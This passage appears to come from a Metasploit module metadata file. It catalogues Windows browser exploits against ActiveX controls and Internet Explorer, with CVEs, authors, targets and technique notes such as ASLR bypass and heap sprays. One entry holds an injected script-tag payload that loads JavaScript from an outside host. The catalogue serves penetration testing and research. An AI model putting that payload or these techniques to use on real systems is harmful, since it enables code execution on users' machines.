"BID-49100",
"ZDI-11-261"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/hp_easy_printer_care_xmlsimpleaccessor.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_easy_printer_care_xmlsimpleaccessor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_loadrunner_addfile": {
"name": "Persits XUpload ActiveX AddFile Buffer Overflow",
"full_name": "exploit/windows/browser/hp_loadrunner_addfile",
"rank": 300,
"disclosure_date": "2008-01-25",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Persits Software Inc's\n XUpload ActiveX control (version 3.0.0.3) that's included in HP LoadRunner 9.5.\n By passing an overly long string to the AddFile method, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2008-0492",
"OSVDB-40762",
"BID-27456",
"EDB-4987"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"XUpload.ocx 3.0.0.3 on Windows XP SP3 / IE6 SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/hp_loadrunner_addfile.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_loadrunner_addfile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_loadrunner_addfolder": {
"name": "HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow",
"full_name": "exploit/windows/browser/hp_loadrunner_addfolder",
"rank": 400,
"disclosure_date": "2007-12-25",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Persits Software Inc's\n XUpload ActiveX control (version 2.1.0.1) that's included in HP LoadRunner 9.0.\n By passing an overly long string to the AddFolder method, an attacker may be\n able to execute arbitrary code.",
"references": [
"CVE-2007-6530",
"OSVDB-39901",
"BID-27025"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 Pro English / IE6SP0-SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/hp_loadrunner_addfolder.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_loadrunner_addfolder",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_loadrunner_writefilebinary": {
"name": "HP LoadRunner lrFileIOService ActiveX Remote Code Execution",
"full_name": "exploit/windows/browser/hp_loadrunner_writefilebinary",
"rank": 300,
"disclosure_date": "2013-07-24",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability on the lrFileIOService ActiveX, as installed\n with HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method\n where user provided data is used as a memory pointer. This module has been tested\n successfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll\n 11.50.2216.0. In order to bypass ASLR, the non-ASLR-compatible module msvcr71.dll is\n used. This one is installed with HP LoadRunner.",
"references": [
"CVE-2013-2370",
"OSVDB-95640",
"BID-61441",
"ZDI-13-182",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_loadrunner_writefilebinary",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hp_loadrunner_writefilestring": {
"name": "HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution",
"full_name": "exploit/windows/browser/hp_loadrunner_writefilestring",
"rank": 300,
"disclosure_date": "2013-07-24",
"type": "exploit",
"author": [
"Brian Gorenc",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability on the lrFileIOService ActiveX, as installed\n with HP LoadRunner 11.50. The vulnerability exists in the WriteFileString method,\n which allows the user to write arbitrary files. It's abused to drop a payload\n embedded in a dll, which is later loaded through the Init() method from the\n lrMdrvService control, by abusing an insecure LoadLibrary call. This module has\n been tested successfully on IE8 on Windows XP. Virtualization based on the Low\n Integrity Process, on Windows Vista and 7, will stop this module because the DLL\n will be dropped to a virtualized folder, which isn't used by LoadLibrary.",
"references": [
"CVE-2013-4798",
"OSVDB-95642",
"BID-61443",
"ZDI-13-207",
"URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic IE on Windows XP"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb",
"is_install_path": true,
"ref_name": "windows/browser/hp_loadrunner_writefilestring",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hpmqc_progcolor": {
"name": "HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow",
"full_name": "exploit/windows/browser/hpmqc_progcolor",
"rank": 300,
"disclosure_date": "2007-04-04",
"type": "exploit",
"author": [
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in SPIDERLib.Loader\n ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD)\n for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and\n 8.2 SP1 before Patch 32.\n By setting an overly long value to 'ProgColor', an attacker can overrun\n a buffer and execute arbitrary code.",
"references": [
"CVE-2007-1819",
"OSVDB-34317",
"BID-23239",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=497"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/hpmqc_progcolor.rb",
"is_install_path": true,
"ref_name": "windows/browser/hpmqc_progcolor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/hyleos_chemviewx_activex": {
"name": "Hyleos ChemView ActiveX Control Stack Buffer Overflow",
"full_name": "exploit/windows/browser/hyleos_chemviewx_activex",
"rank": 400,
"disclosure_date": "2010-02-10",
"type": "exploit",
"author": [
"Paul Craig <paul.craig@security-assessment.com>",
"Dz_attacker <dz_attacker@hotmail.fr>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow within version 1.9.5.1 of Hyleos\n ChemView (HyleosChemView.ocx). By calling the 'SaveAsMolFile' or 'ReadMolFile' methods\n with an overly long first argument, an attacker can overrun a buffer and execute\n arbitrary code.",
"references": [
"CVE-2010-0679",
"OSVDB-62276",
"URL-http://www.security-assessment.com/files/advisories/2010-02-11_ChemviewX_Activex.pdf",
"EDB-11422"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/hyleos_chemviewx_activex.rb",
"is_install_path": true,
"ref_name": "windows/browser/hyleos_chemviewx_activex",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ibm_spss_c1sizer": {
"name": "IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",
"full_name": "exploit/windows/browser/ibm_spss_c1sizer",
"rank": 300,
"disclosure_date": "2013-04-26",
"type": "exploit",
"author": [
"Alexander Gavrun",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a heap based buffer overflow in the C1Tab ActiveX control,\n while handling the TabCaption property. The affected control can be found in the\n c1sizer.ocx component as included with IBM SPSS SamplePower 3.0. This module has\n been tested successfully on IE 6, 7 and 8 on Windows XP SP3 and IE 8 on Windows 7\n SP1.",
"references": [
"CVE-2012-5946",
"OSVDB-92845",
"BID-59559",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21635476",
"ZDI-13-100"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 8 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ibm_spss_c1sizer.rb",
"is_install_path": true,
"ref_name": "windows/browser/ibm_spss_c1sizer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ibm_tivoli_pme_activex_bof": {
"name": "IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow",
"full_name": "exploit/windows/browser/ibm_tivoli_pme_activex_bof",
"rank": 300,
"disclosure_date": "2012-03-01",
"type": "exploit",
"author": [
"Andrea Micalizzi aka rgod",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability in the\n Isig.isigCtl.1 ActiveX installed with IBM Tivoli Provisioning\n Manager Express for Software Distribution 4.1.1.\n\n The vulnerability is found in the \"RunAndUploadFile\" method\n where the \"OtherFields\" parameter with user controlled data\n is used to build a \"Content-Disposition\" header and attach\n contents in an insecure way which allows to overflow a buffer\n in the stack.",
"references": [
"CVE-2012-0198",
"OSVDB-79735",
"BID-52252",
"ZDI-12-040"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/ibm_tivoli_pme_activex_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ibmegath_getxmlvalue": {
"name": "IBM Access Support ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/ibmegath_getxmlvalue",
"rank": 300,
"disclosure_date": "2009-03-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in IBM Access Support. When\n sending an overly long string to the GetXMLValue() method of IbmEgath.dll\n (3.20.284.0) an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-0215",
"OSVDB-52958",
"BID-34228"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ibmegath_getxmlvalue.rb",
"is_install_path": true,
"ref_name": "windows/browser/ibmegath_getxmlvalue",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ibmlotusdomino_dwa_uploadmodule": {
"name": "IBM Lotus Domino Web Access Upload Module Buffer Overflow",
"full_name": "exploit/windows/browser/ibmlotusdomino_dwa_uploadmodule",
"rank": 300,
"disclosure_date": "2007-12-20",
"type": "exploit",
"author": [
"Elazar Broad <elazarb@earthlink.net>"
],
"description": "This module exploits a stack buffer overflow in IBM Lotus Domino Web Access Upload Module.\n By sending an overly long string to the \"General_ServerName()\" property located\n in the dwa7w.dll and the inotes6w.dll control, an attacker may be able to execute\n arbitrary code.",
"references": [
"CVE-2007-4474",
"OSVDB-40954",
"BID-26972",
"EDB-4820"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb",
"is_install_path": true,
"ref_name": "windows/browser/ibmlotusdomino_dwa_uploadmodule",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_cbutton_uaf": {
"name": "MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
"full_name": "exploit/windows/browser/ie_cbutton_uaf",
"rank": 300,
"disclosure_date": "2012-12-27",
"type": "exploit",
"author": [
"eromang",
"mahmud ab rahman",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>",
"Peter Vreugdenhil"
],
"description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CButton object is freed, but a reference\n is kept and used again during a page reload, an invalid memory that's controllable\n is used, and allows arbitrary code execution under the context of the user.\n\n Please note: This vulnerability has been exploited in the wild targeting\n mainly China/Taiwan/and US-based computers.",
"references": [
"CVE-2012-4792",
"OSVDB-88774",
"US-CERT-VU-154201",
"BID-57070",
"MSB-MS13-008",
"URL-http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html",
"URL-http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/",
"URL-http://technet.microsoft.com/en-us/security/advisory/2794220",
"URL-http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx",
"URL-http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3",
"IE 8 on Windows Vista",
"IE 8 on Windows Server 2003",
"IE 8 on Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ie_cbutton_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_cbutton_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_cgenericelement_uaf": {
"name": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",
"full_name": "exploit/windows/browser/ie_cgenericelement_uaf",
"rank": 400,
"disclosure_date": "2013-05-03",
"type": "exploit",
"author": [
"Unknown",
"EMH",
"juan vazquez <juan.vazquez@metasploit.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.",
"references": [
"CVE-2013-1347",
"OSVDB-92993",
"MSB-MS13-038",
"US-CERT-VU-237655",
"URL-http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx",
"URL-http://r-7.co/IE8-DOL"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 8 on Windows XP SP3",
"IE 8 on Windows Vista",
"IE 8 on Windows Server 2003",
"IE 8 on Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_cgenericelement_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_createobject": {
"name": "MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution",
"full_name": "exploit/windows/browser/ie_createobject",
"rank": 600,
"disclosure_date": "2006-04-11",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a generic code execution vulnerability in Internet\n Explorer by abusing vulnerable ActiveX objects.",
"references": [
"MSB-MS06-014",
"CVE-2006-0003",
"OSVDB-24517",
"MSB-MS06-073",
"CVE-2006-4704",
"OSVDB-30155"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"MS06-014 - RDS.DataSpace",
"MS06-014 - RDS.DataSpace",
"MS06-073 - WMIScriptUtils.WMIObjectBroker2.1",
"UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1",
"UNKNOWN - SoftwareDistribution.WebControl.1",
"UNKNOWN - VsmIDE.DTE",
"UNKNOWN - DExplore.AppObj.8.0",
"UNKNOWN - VisualStudio.DTE.8.0",
"UNKNOWN - Microsoft.DbgClr.DTE.8.0",
"UNKNOWN - VsaIDE.DTE",
"UNKNOWN - Business Object Factory ",
"UNKNOWN - Outlook Data Object",
"UNKNOWN - Outlook.Application"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ie_createobject.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_createobject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_execcommand_uaf": {
"name": "MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ",
"full_name": "exploit/windows/browser/ie_execcommand_uaf",
"rank": 400,
"disclosure_date": "2012-09-14",
"type": "exploit",
"author": [
"unknown",
"eromang",
"binjo",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When\n rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner,\n but the same memory is reused again later in the CMshtmlEd::Exec() function, leading\n to a use-after-free condition.\n\n Please note that this vulnerability has been exploited in the wild since Sep 14 2012.\n\n Also note that presently, this module has some target dependencies for the ROP chain to be\n valid. For WinXP SP3 with IE8, msvcrt must be present (as it is by default).\n For Vista or Win7 with IE8, or Win7 with IE9, JRE 1.6.x or below must be installed (which\n is often the case).",
"references": [
"CVE-2012-4969",
"OSVDB-85532",
"MSB-MS12-063",
"URL-http://technet.microsoft.com/en-us/security/advisory/2757760",
"URL-http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/ie_execcommand_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_execcommand_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_iscomponentinstalled": {
"name": "Microsoft Internet Explorer isComponentInstalled Overflow",
"full_name": "exploit/windows/browser/ie_iscomponentinstalled",
"rank": 300,
"disclosure_date": "2006-02-24",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in Internet Explorer. This bug was\n patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.",
"references": [
"CVE-2006-1016",
"OSVDB-31647",
"BID-16870"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0 with Internet Explorer 6.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ie_iscomponentinstalled.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_iscomponentinstalled",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_setmousecapture_uaf": {
"name": "MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free",
"full_name": "exploit/windows/browser/ie_setmousecapture_uaf",
"rank": 300,
"disclosure_date": "2013-09-17",
"type": "exploit",
"author": [
"Unknown",
"sinn3r <sinn3r@metasploit.com>",
"Rich Lundeen"
],
"description": "This module exploits a use-after-free vulnerability that currently targets Internet\n Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11.\n It was initially found in the wild in Japan, but other regions such as English,\n Chinese, Korean, etc, were targeted as well.\n\n The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a\n reference during an event. An attacker first can set up two elements, where the second\n is the child of the first, and then set up an onlosecapture event handler for the parent\n element. The onlosecapture event seems to require two setCapture() calls to trigger,\n one for the parent element, one for the child. When the setCapture() call for the child\n element is called, it finally triggers the event, which allows the attacker to cause an\n arbitrary memory release using document.write(), which in particular frees up a 0x54-byte\n memory. The exact size of this memory may differ based on the version of IE. After the\n free, an invalid reference will still be kept and pass on to more functions, eventually\n this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary\n code execution) when this function attempts to use this reference to call what appears to\n be a PrivateQueryInterface due to the offset (0x00).\n\n To mimic the same exploit found in the wild, this module will try to use the same DLL\n from Microsoft Office 2007 or 2010 to leverage the attack.",
"references": [
"CVE-2013-3893",
"OSVDB-97380",
"MSB-MS13-080",
"URL-http://technet.microsoft.com/en-us/security/advisory/2887505",
"URL-http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 7 with Office 2007|2010",
"Windows XP with IE 8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_setmousecapture_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ie_unsafe_scripting": {
"name": "Microsoft Internet Explorer Unsafe Scripting Misconfiguration",
"full_name": "exploit/windows/browser/ie_unsafe_scripting",
"rank": 0,
"disclosure_date": "2010-09-20",
"type": "exploit",
"author": [
"natron <natron@metasploit.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>"
],
"description": "This exploit takes advantage of the \"Initialize and script ActiveX controls not\n marked safe for scripting\" setting within Internet Explorer. When this option is set,\n IE allows access to the WScript.Shell ActiveX control, which allows javascript to\n interact with the file system and run commands. This security flaw is not uncommon\n in corporate environments for the 'Intranet' or 'Trusted Site' zones.\n\n When set via domain policy, the most common registry entry to modify is HKLM\\\n Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1201,\n which if set to '0' forces ActiveX controls not marked safe for scripting to be\n enabled for the Intranet zone.\n\n This module creates a javascript/html hybrid that will render correctly either\n via a direct GET http://msf-server/ or as a javascript include, such as in:\n http://intranet-server/xss.asp?id=\"><script%20src=http://10.10.10.10/ie_unsafe_script.js>\n </script>.\n\n IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from\n an x64 iexplore.exe.\n\n By default, this module will not attempt to fire against IEs that come with Protected\n Mode enabled by default, because it can trigger a security prompt. However, if you are\n feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT\n datastore option to true.",
"references": [
"URL-http://support.microsoft.com/kb/182569",
"URL-http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html",
"URL-http://support.microsoft.com/kb/870669"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x86/x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ie_unsafe_scripting.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_unsafe_scripting",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/imgeviewer_tifmergemultifiles": {
"name": "Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control",
"full_name": "exploit/windows/browser/imgeviewer_tifmergemultifiles",
"rank": 300,
"disclosure_date": "2010-03-03",
"type": "exploit",
"author": [
"Dr_IDE",
"TecR0c <roccogiovannicalvi@gmail.com>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow in the Active control file\n ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles()\n method. Exploitation results in code execution with the privileges of the user who\n browsed to the exploit page.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.",
"references": [
"CVE-2010-5193",
"OSVDB-78102",
"EDB-15668",
"URL-http://secunia.com/advisories/42445/",
"URL-http://xforce.iss.net/xforce/xfdb/63666"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Internet Explorer 6/7",
"Internet Explorer 8 with JRE"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb",
"is_install_path": true,
"ref_name": "windows/browser/imgeviewer_tifmergemultifiles",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/indusoft_issymbol_internationalseparator": {
"name": "InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",
"full_name": "exploit/windows/browser/indusoft_issymbol_internationalseparator",
"rank": 300,
"disclosure_date": "2012-04-28",
"type": "exploit",
"author": [
"Alexander Gavrun",
"Dmitriy Pletnev",
"James Fitts <fitts.james@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00\n SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long\n string argument for the InternationalSeparator() method of the ISSymbol control.\n This module uses the msvcr71.dll from the Java JRE6 to bypass ASLR.",
"references": [
"CVE-2011-0340",
"OSVDB-72865",
"BID-47596",
"ZDI-12-168",
"URL-http://secunia.com/secunia_research/2011-37/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb",
"is_install_path": true,
"ref_name": "windows/browser/indusoft_issymbol_internationalseparator",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/inotes_dwa85w_bof": {
"name": "IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/inotes_dwa85w_bof",
"rank": 300,
"disclosure_date": "2012-06-01",
"type": "exploit",
"author": [
"Gaurav Baruah",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of _swscanf. The affected ActiveX is\n provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3.\n\n In order to bypass ASLR, the non-ASLR-compatible module dwabho.dll is used. This one\n is installed with the iNotes ActiveX.",
"references": [
"CVE-2012-2175",
"OSVDB-82755",
"BID-53879",
"ZDI-12-132",
"URL-http://www-304.ibm.com/support/docview.wss?uid=swg21596862"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3",
"IE 8 on Windows XP SP3",
"IE 7 on Windows Vista",
"IE 8 on Windows Vista",
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/inotes_dwa85w_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/inotes_dwa85w_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/intrust_annotatex_add": {
"name": "Quest InTrust Annotation Objects Uninitialized Pointer",
"full_name": "exploit/windows/browser/intrust_annotatex_add",
"rank": 200,
"disclosure_date": "2012-03-28",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"mr_me <steventhomasseeley@gmail.com>"
],
"description": "This module exploits an uninitialized variable vulnerability in the\n Annotation Objects ActiveX component. The ActiveX component loads into memory without\n opting into ASLR so this module exploits the vulnerability against Windows Vista and\n Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX\n points to part of the ROP chain in a heap chunk and the calculated call will hit the\n pivot in a separate heap chunk. This will take some time in the user's browser.",
